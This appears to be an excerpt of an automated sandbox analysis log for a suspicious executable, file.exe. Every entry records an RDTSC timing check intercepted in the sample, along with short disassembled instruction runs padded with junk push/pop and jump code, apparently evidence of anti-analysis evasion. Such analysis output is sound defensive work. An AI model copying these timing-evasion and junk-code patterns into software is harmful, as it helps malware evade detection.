      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C3468 second address: 11C346E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C35E8 second address: 11C35EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C38F2 second address: 11C38F8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C3A49 second address: 11C3A68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b jmp 00007FA1BD1DB184h 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C3C06 second address: 11C3C0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C3C0C second address: 11C3C10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C3C10 second address: 11C3C16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C3C16 second address: 11C3C32 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA1BD1DB18Eh 0x00000008 jmp 00007FA1BD1DB182h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C3D69 second address: 11C3D6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C3D6F second address: 11C3D73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C2BA6 second address: 11C2BD0 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA1BCFB6B8Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007FA1BCFB6B76h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C2BD0 second address: 11C2BD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C2BD4 second address: 11C2BDA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CBE24 second address: 11CBE35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1BD1DB17Dh 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CBE35 second address: 11CBE44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA1BCFB6B7Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CBE44 second address: 11CBE4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1190CBC second address: 1190CC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1190CC2 second address: 11752FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007FA1BD1DB178h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 0000001Ah 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 mov ecx, dword ptr [ebp+122D2D78h] 0x00000029 call dword ptr [ebp+122D33E5h] 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 popad 0x00000035 jmp 00007FA1BD1DB185h 0x0000003a rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1191321 second address: 1191333 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 pushad 0x0000000a je 00007FA1BCFB6B7Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1191333 second address: 119133A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1191611 second address: 1191629 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1BCFB6B84h 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1191C12 second address: 1191C16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1191C16 second address: 1191C63 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA1BCFB6B76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dword ptr [ebp+122D35B5h], ecx 0x00000014 push 0000001Eh 0x00000016 jmp 00007FA1BCFB6B7Dh 0x0000001b pushad 0x0000001c jne 00007FA1BCFB6B76h 0x00000022 sub eax, dword ptr [ebp+122D2A94h] 0x00000028 popad 0x00000029 nop 0x0000002a pushad 0x0000002b jmp 00007FA1BCFB6B86h 0x00000030 push eax 0x00000031 push edx 0x00000032 push edx 0x00000033 pop edx 0x00000034 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1191C63 second address: 1191C67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CB377 second address: 11CB391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1BCFB6B7Eh 0x00000009 jc 00007FA1BCFB6B7Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CB391 second address: 11CB39D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FA1BD1DB17Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CB685 second address: 11CB68C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CB979 second address: 11CB993 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 js 00007FA1BD1DB192h 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e jne 00007FA1BD1DB176h 0x00000014 popad 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CD5D8 second address: 11CD5DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CD5DE second address: 11CD5ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 jnp 00007FA1BD1DB194h 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CD5ED second address: 11CD5F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CD5F3 second address: 11CD5F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D09CB second address: 11D09D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D5F57 second address: 11D5F6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1BD1DB17Fh 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D5C24 second address: 11D5C2E instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA1BCFB6B76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D5C2E second address: 11D5C7D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jl 00007FA1BD1DB176h 0x00000009 pop edi 0x0000000a pushad 0x0000000b jmp 00007FA1BD1DB180h 0x00000010 jc 00007FA1BD1DB176h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pushad 0x0000001a pushad 0x0000001b push edi 0x0000001c pop edi 0x0000001d jnl 00007FA1BD1DB176h 0x00000023 jmp 00007FA1BD1DB183h 0x00000028 push esi 0x00000029 pop esi 0x0000002a popad 0x0000002b jc 00007FA1BD1DB178h 0x00000031 pushad 0x00000032 popad 0x00000033 push ebx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D5C7D second address: 11D5C8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007FA1BCFB6B76h 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D5C8A second address: 11D5C8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D690B second address: 11D692E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1BCFB6B80h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FA1BCFB6B7Fh 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D692E second address: 11D6948 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1BD1DB180h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D6948 second address: 11D6972 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1BCFB6B83h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FA1BCFB6B80h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D6972 second address: 11D698D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1BD1DB185h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D698D second address: 11D6992 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D6992 second address: 11D699D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114FA60 second address: 114FA66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114FA66 second address: 114FA6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DBF14 second address: 11DBF1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DBF1A second address: 11DBF1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DBF1F second address: 11DBF26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DBF26 second address: 11DBF58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1BD1DB181h 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007FA1BD1DB183h 0x00000010 pop eax 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DBF58 second address: 11DBF62 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA1BCFB6B76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DC390 second address: 11DC395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DC395 second address: 11DC3C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA1BCFB6B81h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA1BCFB6B83h 0x00000012 jng 00007FA1BCFB6B76h 0x00000018 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DEB8F second address: 11DEB95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DEB95 second address: 11DEB9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DEB9B second address: 11DEB9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E8545 second address: 11E854B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E7181 second address: 11E71BE instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA1BD1DB187h 0x00000008 jmp 00007FA1BD1DB188h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jo 00007FA1BD1DB18Eh 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E71BE second address: 11E71C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E7555 second address: 11E755D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E755D second address: 11E7570 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push ebx 0x00000007 jnp 00007FA1BCFB6B78h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E7570 second address: 11E7576 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1191A81 second address: 1191A87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1191A87 second address: 1191A8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1191A8B second address: 1191A8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E76DC second address: 11E76E6 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA1BD1DB17Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E76E6 second address: 11E76F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ED228 second address: 11ED22C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EC4A8 second address: 11EC4AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EC76F second address: 11EC775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EC775 second address: 11EC779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EC8E3 second address: 11EC8EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EC8EB second address: 11EC8FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007FA1BCFB6B76h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EC8FA second address: 11EC8FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EC8FE second address: 11EC904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EC904 second address: 11EC90D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ECA76 second address: 11ECA83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 js 00007FA1BCFB6B94h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ECA83 second address: 11ECAA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1BD1DB188h 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ECC11 second address: 11ECC17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ECC17 second address: 11ECC1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ECC1B second address: 11ECC1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ECC1F second address: 11ECC3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA1BD1DB184h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ECDA0 second address: 11ECDA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ECDA6 second address: 11ECDAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ECDAC second address: 11ECDC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push esi 0x00000007 pop esi 0x00000008 jnc 00007FA1BCFB6B76h 0x0000000e pop eax 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ECDC2 second address: 11ECDC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ECDC6 second address: 11ECDF4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA1BCFB6B76h 0x00000008 jmp 00007FA1BCFB6B7Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007FA1BCFB6B89h 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ECDF4 second address: 11ECE06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jbe 00007FA1BD1DB176h 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F4987 second address: 11F498E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F498E second address: 11F49A4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA1BD1DB178h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007FA1BD1DB178h 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F49A4 second address: 11F49C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007FA1BCFB6B88h 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F32DA second address: 11F32F4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FA1BD1DB184h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F38B9 second address: 11F38C5 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA1BCFB6B76h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F43D1 second address: 11F4412 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1BD1DB185h 0x00000009 pop edi 0x0000000a pushad 0x0000000b push edx 0x0000000c jne 00007FA1BD1DB176h 0x00000012 pop edx 0x00000013 push ebx 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 jmp 00007FA1BD1DB187h 0x0000001b pop ebx 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FA2CE second address: 11FA2E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1BCFB6B82h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FA2E6 second address: 11FA315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push esi 0x00000007 pop esi 0x00000008 pop ebx 0x00000009 popad 0x0000000a pushad 0x0000000b jnl 00007FA1BD1DB17Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 jl 00007FA1BD1DB176h 0x00000019 jmp 00007FA1BD1DB180h 0x0000001e rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FA315 second address: 11FA334 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1BCFB6B7Fh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007FA1BCFB6B7Eh 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FE3D7 second address: 11FE3DD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
